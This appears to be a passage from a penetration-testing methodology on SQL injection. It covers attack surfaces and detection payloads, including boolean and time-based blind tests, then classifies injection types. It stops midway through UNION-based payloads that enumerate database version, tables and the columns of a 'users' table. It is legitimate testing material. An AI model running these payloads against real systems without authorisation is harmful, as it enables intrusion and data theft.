sqlilisted

# SQL Injection ## Attack Surface Any user-controlled value that reaches a SQL query without parameterisation: form fields, URL parameters, HTTP headers (User-Agent, Referer, X-Forwarded-For, Cookie), JSON/XML body fields, search boxes, sort/order parameters, GraphQL variables. ## Methodology ### Phase 1 — Detection Test all injection points with: ``` ' -- error-based detection '' -- escaped quote (normalised input) ` -- MySQL backtick ') -- close parenthesis 1' OR '1'='1 1 AND 1=1 1 AND 1=2 -- compare responses for boolean blind 1; SELECT SLEEP(5)-- -- time-based blind ``` Observe: HTTP status changes, response length diffs, error messages, timing differences. ### Phase 2 — Classification | Injection type | Indicator | |---|---| | Error-based | DB error message in response | | UNION-based | Response reflects query output | | Boolean blind | Binary response difference (login/no login, 200/500) | | Time-based blind | Response delay on `SLEEP()`/`WAITFOR DELAY` | | Out-of-band | DNS/HTTP callback from DB server | | Second-order | Stored, triggered on later retrieval | ### Phase 3 — Exploitation **UNION-based (enumerate columns first):** ```sql 1 ORDER BY 1-- -- increment until error to find column count 1 UNION SELECT NULL,NULL,NULL-- 1 UNION SELECT 1,version(),database()-- 1 UNION SELECT 1,table_name,3 FROM information_schema.tables-- 1 UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--